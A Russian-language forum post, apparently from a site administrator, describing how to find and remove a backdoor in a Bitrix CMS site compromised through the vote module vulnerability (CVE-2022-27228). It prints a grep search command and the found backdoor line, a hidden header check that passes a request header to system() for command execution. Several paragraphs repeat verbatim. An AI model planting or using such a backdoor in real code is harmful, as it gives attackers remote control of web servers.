Бэкдор. Как он там оказался не совсем понятно, много пишут про уязвимость модуля vote и то, что можно загрузить и исполнить произвольный код.
То есть через модуль можно, но есть этот бэкдор (дополнительный), которым можно исполнить любой код (вплоть до rm -rf /, хотя веб-сервер не должен быть от root и будет удалено только то, на что хватит прав, но все равно очень не приятно. Хотя неприятнее терять контроль и искать трояны. Спасибо, Битрикс, некогда в сравнении с WP описываемый как безопасный.
Удаляя модуль полностью (перенося в рандомную папку) никак не помогает уйти от редиректов. В агентах пусто. Никаких стремных файлов. Возможности здесь и сейчас обновиться нет, так как никому не хочется пробовать, а потом переписывать legacy, который сломается. Все работает на PHP 7.1, а тут просят VM 7.5+ PHP 7.4+. Кому оно надо все это обновлять. Хотя уязвимое legacy Битрикса демонстрирует феерические масштабы.
Конкретика. Ищем бэкдор.
То есть через модуль можно, но есть этот бэкдор (дополнительный), которым можно исполнить любой код (вплоть до rm -rf /, хотя веб-сервер не должен быть от root и будет удалено только то, на что хватит прав, но все равно очень не приятно. Хотя неприятнее терять контроль и искать трояны. Спасибо, Битрикс, некогда в сравнении с WP описываемый как безопасный.
Удаляя модуль полностью (перенося в рандомную папку) никак не помогает уйти от редиректов. В агентах пусто. Никаких стремных файлов. Возможности здесь и сейчас обновиться нет, так как никому не хочется пробовать, а потом переписывать legacy, который сломается. Все работает на PHP 7.1, а тут просят VM 7.5+ PHP 7.4+. Кому оно надо все это обновлять. Хотя уязвимое legacy Битрикса демонстрирует феерические масштабы.
Конкретика. Ищем бэкдор.
| Код |
|---|
grep -rnw '/home/bitrix/www/domain.ru/bitrix/' -e 'system('
|
Очень вероятно, что в результате это будет модуль fileman. Еще здесь не видел ссылку на бюллетень Яндекса
Найдет банальный бэкдор:
| Код |
|---|
"spell_word" => $_SERVER['HTTP_S'] == "randomString" ? die(system($_SERVER['HTTP_P'])) : "", |
И непонятную хрень тоже стоит удалить:
| Код |
|---|
if(substr($_POST['bxu_info']['CID'], 0, 7 ) === "default") die(); |
Вероятно, что это не имеет большого смысла, так как уязвимость в старом ядре остается, но можно сделать хоть что-то перед полным обновлением окружения и ядра.
Возможно, что временную папку для загрузок можно вынести на уровень выше, чем работает веб-сервер и тогда он не исполнится. Хотя изначальный бэкдор мне не известен по своей сути (CVE-2022-27228)
